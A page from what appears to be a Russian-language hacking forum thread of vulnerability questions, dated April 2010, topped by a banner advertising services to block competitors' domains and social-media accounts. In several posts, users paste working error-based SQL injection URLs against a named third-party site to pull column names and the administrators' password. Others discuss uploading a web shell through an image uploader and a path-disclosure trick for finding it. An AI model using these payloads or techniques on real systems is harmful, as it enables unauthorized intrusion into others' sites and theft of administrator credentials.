Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1267 из 2438

1267

Опции темы

Поиск в этой теме

Опции просмотра

#12661

21.04.2010, 19:48

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

С нами: 8638130

Репутация: 54

thanks=)

#12662

21.04.2010, 19:53

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

С нами: 9594385

Репутация: 386

Цитата:

Сообщение от GOGA075

Какой функцией нужно делать поиск по БД?

http://www.mysql.ru/docs/man/String_comparison_functions.html
мм ? или
http://www.mysql.ru/docs/man/Fulltext_Search.html

Последний раз редактировалось warlok; 21.04.2010 в 19:56..

#12663

21.04.2010, 20:15

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

С нами: 9534473

Репутация: 18

warlok, а может чо по проще?
А то там ничего не понятно!!!!!

#12664

21.04.2010, 21:08

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

С нами: 8797559

Репутация: -16

Цитата:

http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+column_N ame+from+information_schema.columns+where+table_Na me=0x61646D696E6973747261746F727331+limit+8,1),flo or(rand(0)*2))+From+menus+Group+By+2)a)

не мояу наыти column_name
помоqите

#12665

21.04.2010, 23:34

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

С нами: 9534473

Репутация: 18

Пипл, подскажите как дклать поиск по БД....

#12666

22.04.2010, 01:58

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

С нами: 9642449

Репутация: 606

Цитата:

Сообщение от GOGA075

warlok, а может чо по проще?
А то там ничего не понятно!!!!!

попроще - заюзай phpmyadmin

#12667

22.04.2010, 07:14

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

С нами: 9534473

Репутация: 18

попугай, возможнасти залить нету!!!
там есть возможность залить шел через картинку, но только адрес до него что-то типо getimg.php?type=main&file=08736050.php
а прямой путь нужно в БД искать!!!

#12668

22.04.2010, 08:32

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

С нами: 8797559

Репутация: -16

Цитата:

http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Sele ct+1+From+(Select+count(0),concat((Select+pass+fro m+administrators+limit+1,1),floor(rand(0)*2))+From +administrators+Group+By+2)a)

вот нашел table_name и у нево column_name а теперь не получается..
pomoqite..

#12669

22.04.2010, 13:57

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

С нами: 9642449

Репутация: 606

Цитата:

Сообщение от GOGA075

попробуй раскрыть путь, например,
getimg.php?type=main&file[]=08736050.php'
или в папках типа uploads, images глянуть. Это если файлы не в базу записываются.

про mod rewrite

#12670

22.04.2010, 17:08

mr.celt

Участник форума

Регистрация: 06.02.2008

Сообщений: 110

С нами: 9610572

Репутация: 32

про mod rewrite

Вопрос наверное риторический. Наверное многим попадались сайты, где скажем ссылки типа http://site.com/news/news567.html.... Такое чувство, что включен mod rewrite, а не статические страницы. Можно ли здесь найти sql-инъекцию например?

Страница 1267 из 2438

1267

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход